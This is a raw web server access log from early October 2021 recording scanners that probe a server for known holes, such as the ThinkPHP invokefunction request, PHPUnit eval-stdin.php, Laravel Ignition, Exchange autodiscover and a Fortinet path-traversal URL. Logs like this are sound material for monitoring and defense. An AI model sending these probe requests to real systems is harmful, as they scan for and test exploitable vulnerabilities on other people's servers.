"Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1" "-" [02/Oct/2021:23:54:01 +0000] 400 - GET http 64.22.31.253 "/HNAP1/" [Client 20.55.75.76] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1" "https://64.22.31.253/" [02/Oct/2021:23:54:01 +0000] 400 - GET http 64.22.31.253 "/HNAP1/" [Client 20.55.75.76] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1" "https://64.22.31.253/" [02/Oct/2021:23:54:01 +0000] 400 - GET http 64.22.31.253 "/HNAP1/" [Client 20.55.75.76] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1" "https://64.22.31.253/" [03/Oct/2021:00:01:10 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.204.131] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [03/Oct/2021:00:28:56 +0000] 444 - GET https 64.22.31.253 "/owa/auth/x.js" [Client 192.241.198.208] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [03/Oct/2021:00:31:20 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.198.206] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [03/Oct/2021:00:32:10 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx" [Client 192.241.208.162] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [03/Oct/2021:00:44:15 +0000] 444 - GET https 64.22.31.253 "/" [Client 162.221.192.26] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [03/Oct/2021:01:03:24 +0000] 444 - GET https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [03/Oct/2021:01:03:26 +0000] 444 - GET https 64.22.31.253 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [03/Oct/2021:01:03:27 +0000] 444 - POST https 64.22.31.253 "/mifs/.;/services/LogService" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.31.253:443" [03/Oct/2021:01:03:28 +0000] 444 - GET https 64.22.31.253 "/wp-content/plugins/wp-file-manager/readme.txt" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [03/Oct/2021:01:03:29 +0000] 444 - GET https 64.22.31.253 "/?XDEBUG_SESSION_START=phpstorm" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [03/Oct/2021:01:03:31 +0000] 444 - GET https 64.22.31.253 "/console/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [03/Oct/2021:01:03:32 +0000] 444 - POST https 64.22.31.253 "/Autodiscover/Autodiscover.xml" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [03/Oct/2021:01:03:32 +0000] 444 - GET https 64.22.31.253 "/_ignition/execute-solution" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [03/Oct/2021:01:03:32 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [03/Oct/2021:01:03:35 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [03/Oct/2021:01:03:36 +0000] 444 - POST https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [03/Oct/2021:01:03:39 +0000] 444 - POST https 64.22.31.253 "/api/jsonws/invoke" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [03/Oct/2021:02:33:28 +0000] 444 - GET https 64.22.31.253 "/" [Client 167.248.133.44] [Length 0] [Gzip -] "-" "-" [03/Oct/2021:02:33:29 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.248.133.44] [Length 252] [Gzip -] "-" "-" [03/Oct/2021:02:33:29 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.248.133.44] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [03/Oct/2021:03:46:36 +0000] 444 - GET https home.moralanimal.net "/" [Client 61.135.15.180] [Length 0] [Gzip -] "Mozilla/5.0 (Linux; Android 7.0; Pixel 1 Build/OPD2.1672) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Mobile Safari/537.36" "-" [03/Oct/2021:04:20:00 +0000] 444 - GET https 64.22.31.253 "/" [Client 216.218.206.67] [Length 0] [Gzip -] "-" "-" [03/Oct/2021:05:24:04 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.62.185] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [03/Oct/2021:05:32:50 +0000] 444 - GET https 64.22.31.253 "/" [Client 185.180.143.75] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36" "-" [03/Oct/2021:05:32:51 +0000] 400 - GET http 64.22.31.253 "/" [Client 185.180.143.75] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36" "-" [03/Oct/2021:06:17:58 +0000] 444 - GET https 64.22.31.253 "/actuator/health" [Client 192.241.204.70] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [03/Oct/2021:06:24:52 +0000] 444 - GET https 64.22.31.253 "/autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com" [Client 89.248.165.43] [Length 0] [Gzip -] "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" "-" [03/Oct/2021:07:02:49 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.1.248.42] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [03/Oct/2021:09:09:19 +0000] 444 - HEAD https localhost "/" [Client 162.62.117.51] [Length 0] [Gzip -] "-" "-" [03/Oct/2021:09:49:10 +0000] 444 - GET https 64.22.31.253 "/" [Client 192.241.204.136] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [03/Oct/2021:11:16:31 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.62.185] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [03/Oct/2021:11:34:33 +0000] 444 - GET https 64.22.31.253 "/" [Client 162.221.192.26] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [03/Oct/2021:12:18:09 +0000] 444 - POST https 64.22.31.253 "/" [Client 167.99.95.237] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [03/Oct/2021:12:32:19 +0000] 444 - GET https 64.22.31.253 "///remote/fgt_lang?lang=/../../../..//////////dev/" [Client 91.132.58.81] [Length 0] [Gzip -] "python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-1160.41.1.el7.x86_64" "-" [03/Oct/2021:13:03:06 +0000] 400 - GET http 64.22.31.253 "/" [Client 199.195.251.49] [Length 252] [Gzip -] "Linux Gnu (cow)" "-" [03/Oct/2021:13:43:23 +0000] 400 - - http localhost "-" [Client 66.240.205.34] [Length 154] [Gzip -] "-" "-" [03/Oct/2021:14:26:09 +0000] 444 - GET https 64.22.31.253 "/" [Client 162.142.125.58] [Length 0] [Gzip -] "-" "-" [03/Oct/2021:14:26:10 +0000] 400 - GET http 64.22.31.253 "/" [Client 162.142.125.58] [Length 252] [Gzip -] "-" "-" [03/Oct/2021:14:26:10 +0000] 400 - GET http 64.22.31.253 "/" [Client 162.142.125.58] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [03/Oct/2021:14:42:59 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.62.185] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [03/Oct/2021:15:21:20 +0000] 400 - GET http 64.22.31.253 "/" [Client 199.195.251.49] [Length 252] [Gzip -] "Linux Gnu (cow)" "-" [03/Oct/2021:16:06:42 +0000] 444 - GET https 64.22.31.253 "/cgi-bin/config.exp" [Client 128.1.248.42] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [03/Oct/2021:17:24:50 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [03/Oct/2021:17:24:50 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [03/Oct/2021:17:24:50 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [03/Oct/2021:17:24:50 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [03/Oct/2021:17:24:50 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [03/Oct/2021:17:24:50 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [03/Oct/2021:18:29:54 +0000] 444 - GET https 64.22.31.253 "/bag2" [Client 139.162.145.250] [Length 0] [Gzip -] "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)" "-" [03/Oct/2021:19:06:53 +0000] 444 - POST https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [03/Oct/2021:19:06:53 +0000] 444 - POST https 64.22.31.253 "/api/jsonws/invoke" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [03/Oct/2021:19:06:54 +0000] 444 - GET https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [03/Oct/2021:19:06:54 +0000] 444 - GET https 64.22.31.253 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [03/Oct/2021:19:06:55 +0000] 444 - POST https 64.22.31.253 "/mifs/.;/services/LogService" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.31.253:443" [03/Oct/2021:19:06:56 +0000] 444 - GET https 64.22.31.253 "/?XDEBUG_SESSION_START=phpstorm" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [03/Oct/2021:19:06:57 +0000] 444 - GET https 64.22.31.253 "/wp-content/plugins/wp-file-manager/readme.txt" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [03/Oct/2021:19:06:57 +0000] 444 - GET https 64.22.31.253 "/console/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [03/Oct/2021:19:07:00 +0000] 444 - GET https 64.22.31.253 "/_ignition/execute-solution" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [03/Oct/2021:19:07:00 +0000] 444 - POST https 64.22.31.253 "/Autodiscover/Autodiscover.xml" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [03/Oct/2021:19:07:01 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [03/Oct/2021:19:07:02 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [03/Oct/2021:19:46:28 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.62.185] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [03/Oct/2021:20:08:30 +0000] 444 - GET https pop.moralanimal.net "/" [Client 92.118.160.5] [Length 0] [Gzip -] "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com" "-" [03/Oct/2021:21:18:35 +0000] 400 - GET http 64.22.31.253 "/manager/text/list" [Client 192.241.205.27] [Length 252] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [03/Oct/2021:21:37:52 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 107.189.31.252] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [03/Oct/2021:22:22:45 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 199.19.225.172] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [03/Oct/2021:22:56:36 +0000] 400 - GET http 64.22.31.253 "/" [Client 199.195.251.49] [Length 252] [Gzip -] "Linux Gnu (cow)" "-" [04/Oct/2021:00:03:35 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.203.117] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [04/Oct/2021:00:31:01 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx" [Client 192.241.208.229] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [04/Oct/2021:00:31:30 +0000] 444 - GET https 64.22.31.253 "/owa/auth/x.js" [Client 192.241.200.61] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [04/Oct/2021:00:34:12 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.208.235] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [04/Oct/2021:00:54:08 +0000] 400 - GET http 64.22.31.253 "/" [Client 199.195.251.49] [Length 252] [Gzip -] "Linux Gnu (cow)" "-" [04/Oct/2021:01:23:04 +0000] 444 - GET https 64.22.31.253 "/" [Client 184.105.247.252] [Length 0] [Gzip -] "-" "-" [04/Oct/2021:01:23:54 +0000] 400 - GET http 64.22.31.253 "/manager/html" [Client 192.241.201.142] [Length 252] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [04/Oct/2021:03:13:30 +0000] 444 - GET https 64.22.31.253 "/" [Client 80.82.77.192] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36" "-" [04/Oct/2021:03:18:56 +0000] 400 - GET http 64.22.31.253 "/" [Client 80.82.77.192] [Length 252] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [04/Oct/2021:04:11:49 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.62.185] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [04/Oct/2021:04:21:52 +0000] 400 - - http localhost "-" [Client 61.219.11.151] [Length 154] [Gzip -] "-" "-" [04/Oct/2021:04:26:13 +0000] 444 - GET https 64.22.31.253 "/" [Client 52.40.67.188] [Length 0] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36" "-" [04/Oct/2021:04:28:11 +0000] 444 - GET https 64.22.31.253 "/" [Client 23.251.102.74] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [04/Oct/2021:05:36:18 +0000] 400 - GET http localhost "/" [Client 165.22.209.17] [Length 252] [Gzip -] "-" "-" [04/Oct/2021:06:05:52 +0000] 444 - GET https 64.22.31.253 "/" [Client 183.136.225.9] [Length 0] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0" "-" [04/Oct/2021:06:06:17 +0000] 444 - GET https 64.22.31.253 "/" [Client 193.106.29.210] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0" "-" [04/Oct/2021:06:22:53 +0000] 444 - GET https 64.22.31.253 "/actuator/health" [Client 192.241.203.62] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [04/Oct/2021:06:32:39 +0000] 444 - GET https 64.22.31.253 "/" [Client 107.172.168.182] [Length 0] [Gzip -] "Mozilla/5.0" "-" [04/Oct/2021:08:02:43 +0000] 400 - GET http 64.22.31.253 "/" [Client 199.195.251.49] [Length 252] [Gzip -] "Linux Gnu (cow)" "-" [04/Oct/2021:09:01:33 +0000] 444 - GET https 64.22.31.253 "/web/index.html" [Client 92.118.160.17] [Length 0] [Gzip -] "Go http package" "-" [04/Oct/2021:09:21:46 +0000] 444 - GET https 253.31.22.64.aeneasdsl.com "/" [Client 61.135.15.166] [Length 0] [Gzip -] "Mozilla/5.0 (Linux; U; Android 9; zh-cn; RMX1901 Build/QKQ1.190918.001) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/70.0.3538.80 Mobile Safari/537.36 HeyTapBrowser/40.7.22.1" "-" [04/Oct/2021:09:37:40 +0000] 444 - GET https lndshark.moralanimal.net "/" [Client 92.118.160.17] [Length 0] [Gzip -] "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com" "-" [04/Oct/2021:09:49:48 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.62.185] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [04/Oct/2021:09:51:29 +0000] 444 - GET https 64.22.31.253 "/" [Client 192.241.206.199] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [04/Oct/2021:11:09:08 +0000] 400 - GET http 64.22.31.253 "/" [Client 199.195.251.49] [Length 252] [Gzip -] "Linux Gnu (cow)" "-" [04/Oct/2021:12:11:50 +0000] 444 - GET https agent.moralanimal.net "/" [Client 164.90.142.241] [Length 0] [Gzip -] "Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)" "-" [04/Oct/2021:12:44:00 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f" [Client 192.241.205.231] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [04/Oct/2021:13:20:07 +0000] 444 - GET https 64.22.31.253 "/" [Client 162.62.117.51] [Length 0] [Gzip -] "-" "-" [04/Oct/2021:13:36:23 +0000] 400 - GET http 64.22.31.253 "/bag2" [Client 139.162.145.250] [Length 654] [Gzip -] "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)" "-" [04/Oct/2021:13:49:07 +0000] 444 - GET https 64.22.31.253 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [04/Oct/2021:13:49:07 +0000] 444 - GET https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [04/Oct/2021:13:49:10 +0000] 444 - GET https 64.22.31.253 "/?XDEBUG_SESSION_START=phpstorm" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [04/Oct/2021:13:49:10 +0000] 444 - POST https 64.22.31.253 "/mifs/.;/services/LogService" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.31.253:443" [04/Oct/2021:13:49:11 +0000] 444 - GET https 64.22.31.253 "/wp-content/plugins/wp-file-manager/readme.txt" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [04/Oct/2021:13:49:14 +0000] 444 - POST https 64.22.31.253 "/api/jsonws/invoke" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [04/Oct/2021:13:49:15 +0000] 444 - GET https 64.22.31.253 "/console/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [04/Oct/2021:13:49:17 +0000] 444 - POST https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [04/Oct/2021:13:49:19 +0000] 444 - POST https 64.22.31.253 "/Autodiscover/Autodiscover.xml" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [04/Oct/2021:13:49:20 +0000] 444 - GET https 64.22.31.253 "/_ignition/execute-solution" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [04/Oct/2021:13:49:22 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [04/Oct/2021:13:49:23 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [04/Oct/2021:14:25:20 +0000] 444 - GET https 64.22.31.253 "/" [Client 192.35.168.80] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [04/Oct/2021:15:33:57 +0000] 400 - - http localhost "-" [Client 191.96.168.221] [Length 154] [Gzip -] "-" "-" [04/Oct/2021:16:02:03 +0000] 400 - GET http 64.22.31.253 "/" [Client 199.195.251.49] [Length 252] [Gzip -] "Linux Gnu (cow)" "-" [04/Oct/2021:16:21:27 +0000] 444 - GET https 64.22.31.253 "/" [Client 223.71.167.164] [Length 0] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0" "-" [04/Oct/2021:16:21:28 +0000] 400 - GET http 64.22.31.253 "/" [Client 223.71.167.164] [Length 252] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0" "-" [04/Oct/2021:20:53:31 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [04/Oct/2021:20:53:31 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [04/Oct/2021:20:53:31 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [04/Oct/2021:20:53:31 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 